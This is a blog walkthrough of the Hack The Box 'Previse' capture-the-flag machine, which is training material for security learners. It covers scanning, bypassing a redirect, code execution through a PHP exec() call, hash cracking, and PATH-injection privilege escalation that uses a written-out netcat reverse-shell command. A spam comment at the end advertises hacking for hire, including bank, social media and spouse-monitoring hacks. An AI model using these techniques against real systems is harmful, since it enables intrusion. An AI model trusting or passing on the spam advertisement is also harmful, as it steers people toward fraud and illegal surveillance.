Hack The Box Previse HTB CTF Machine Walkthrough
In this blog, we will cover the Previse HTB CTF challenge that is an easy machine. It is to Capture the flag types of CTF challenges. You will get to know a lot of learning in this CTF challenge. For example, Path Variable, Code Execution, Hashes Decrypting, etc.
Table of Content
Scanning
- Port Scanning (Nmap Tool)
Enumeration
- Directory Scanning through Gobuster
Exploitation
- Code Execution through PHP
- Decrypt MD5 Hash using Hashcat
- Read (User.txt )
Privilege Escalation
- Sudo Right with PATH Variable
- Read (root.txt)
Scanning
As you know, we always do the first scan of the target network. Nmap may be the best tool for network scanning. To get more information regarding the Nmap command, Follow the below link.
nmap -sC -sV -oA nmap/previse 10.10.11.104
I found port 22 for SSH, Port 80 for HTTP are opened.
Previse website Index page looks like this.
Enumeration
In most of the challenging stages, we need directory scanning. The Kali Linux carries several directory scanning tools for the penetration tester. Gobuster is a popular directory scanning tool, and we will use this tool for directory scanning. Let’s follow the below command.
gobuster dir --url http://10.10.11.104/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php -o directory.log
We found /nav.php file on scan with gobuster tool, which doesn’t redirect to other pages. Let us open this file.
But as soon as we tried to open /account.php page, we got redirected to login.php. We intercepted requests from /account.php using BurpSuite. Follow the below image.
Let’s change the status code 302 to 200. “200 OK”
Excellent, we have found the page to create an account.
Let’s create an account.
Account creation was successful.
Let’s login with the latest credential.
We got a SITEBACKUP.zip file. Let’s download it.
We found two files quite interesting after unzipping.
config.php, logs.php
Surprise, I have obtained the username and password of the database. note it.
- user = “root”
- password = “mySQL_p@ssw0rd!:)”
Returning to the page source code reviews searching for possible flaws was found the exec() function and it was possible to abuse it for code execution.
Exploitation
Let’s use Burp to intercept the request from /logs.php page and test the code execution… Successful!
Finally, we are ready for the reverse shell. Successful!
Finally, We are inside! Let’s log in to MySQL using the above credentials. If you have no idea. How Can I See List all Users In A MySQL Database Server? I think you should read the following blog.
We have got a username and password, but the password is in an encrypted format.
We used hashcat to decrypt the hash with rockyou.txt wordlist.
hashcat -a 0 -m 500 user /usr/share/wordlists/rockyou.txt
We used ssh to connect as an m4lwhere user. Login Successful. We got our first flag.
“user.txt”
Privilege Escalation
Now we need to escalate our privilege. Let’s type the command: sudo -l.
Let’s Analyze the /opt/scripts/access_backup.sh script, you can see that some commands/binaries are called directly and there may be the vulnerability of “path injection”.
I configured the environment variable in /tmp directory and created the “date” file containing a netcat command to return a reverse shell on port 9001.
echo "nc 10.10.14.4 9001 -e /bin/bash" > date
export PATH=/tmp:$PATH
Let’s execute the following command.
sudo /opt/scripts/access_backup.sh
We have received the reverse shell connection as root successfully!
We have got our second root flag!!!!!!!!. Subscribe to Pentestblog Youtube Channel…..
Recent Posts
- CVE-2022-30190 (Follina)-Microsoft Support Diagnostic Tool Vulnerability
- SQL INJECTION – Extracting Username and Password From Database
- How To Dump Username And Password Using SQLMap Tool?
- Protected: Exploit Apache Log4j Security Vulnerabilities – CVE-2021-44228
- Hack The Box Previse HTB CTF Machine Walkthrough
The professional hacker true out the word that I believed in him is only Henryclarkethicalhacker Group Hackers Checked Google and see everybody comments on him he a professional that I believed in him if you have problems on any stuffed like a bank, company, school grades change examinations, database, Social media hacks, Email hacks, Phone hacks, Bitcoin hacks, increased Credit score boost to 800, School result upgrading, cryptocurrency, Binary option funds recovery, Bitcoin Mining, Instagram, WhatsApp, Twitter, Monitor your colleague, access your spouse social media, and a lot more, via, , on whatsapp 18134211326..